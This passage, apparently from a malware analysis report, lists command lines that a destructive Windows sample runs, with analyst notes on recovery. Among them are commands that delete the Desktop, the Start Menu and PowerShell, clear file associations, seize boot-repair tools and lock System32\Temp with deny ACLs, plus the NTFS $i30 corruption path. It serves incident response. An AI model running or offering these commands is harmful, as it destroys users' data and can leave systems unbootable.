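  Note: 'C:\:$i30:$bitmap' is the NTFS index-attribute path publicly reported in 2021 to make unpatched Windows 10 builds flag the volume as corrupted, so it is presumably here to damage the file system; on an affected host, check the volume's dirty state and patch level before trusting the disk.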
- '%WINDIR%\syswow64\cmd.exe' /c del /s /f /q "%appdata%\Microsoft\Windows\Start Menu\Programs\*"
- '%WINDIR%\syswow64\cmd.exe' /c assoc .cmd=
- '%WINDIR%\syswow64\cmd.exe' /c rd /s /q "%ProgramFiles%\WindowsPowerShell"
- '%WINDIR%\syswow64\cmd.exe' /c attrib +r +s +h <SYSTEM32>\Temp
- '%WINDIR%\syswow64\attrib.exe' +r +s +h <SYSTEM32>\Temp\shutdowncounter.txt
- '%WINDIR%\syswow64\cmd.exe' /c takeown /f <SYSTEM32>\Temp /R /D Y
- '%WINDIR%\syswow64\takeown.exe' /f <SYSTEM32>\Temp /R /D Y
- '%WINDIR%\syswow64\cmd.exe' /c icacls <SYSTEM32>\Temp /deny Everyone:(DE,WO,AS,GW,WD,AD,WEA,DC,WA) /T /C /Q
- '%WINDIR%\syswow64\icacls.exe' <SYSTEM32>\Temp /deny Everyone:(DE,WO,AS,GW,WD,AD,WEA,DC,WA) /T /C /Q
- '%WINDIR%\syswow64\cmd.exe' /c takeown /f <SYSTEM32>\bcdboot.exe
- '%WINDIR%\syswow64\takeown.exe' /f <SYSTEM32>\bcdboot.exe
- '%WINDIR%\syswow64\cmd.exe' /c takeown /f <SYSTEM32>\bcdedit.exe
- '%WINDIR%\syswow64\takeown.exe' /f <SYSTEM32>\bcdedit.exe
- '%WINDIR%\syswow64\cmd.exe' /c takeown /f <SYSTEM32>\bootsect.exe
- '%WINDIR%\syswow64\cmd.exe' /c rd /s /q %Userprofile%\Desktop
- '%WINDIR%\syswow64\cmd.exe' /c for /r <SYSTEM32>\Temp\ %i in (*.*) do attrib +r +s +h %i
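- '%WINDIR%\syswow64\cmd.exe' /c assoc .reg=
  Note: 'assoc .ext=' deletes the file-type association, so the .vbs, .bat, .inf, .ps1, .cmd and .reg files named in this list no longer open with their handler. Together with the deletion of PowerShell, bcdedit.exe, bcdboot.exe and bootsect.exe, this removes the usual script and boot-repair tools from the host, so clean-up is more reliable offline from trusted recovery media.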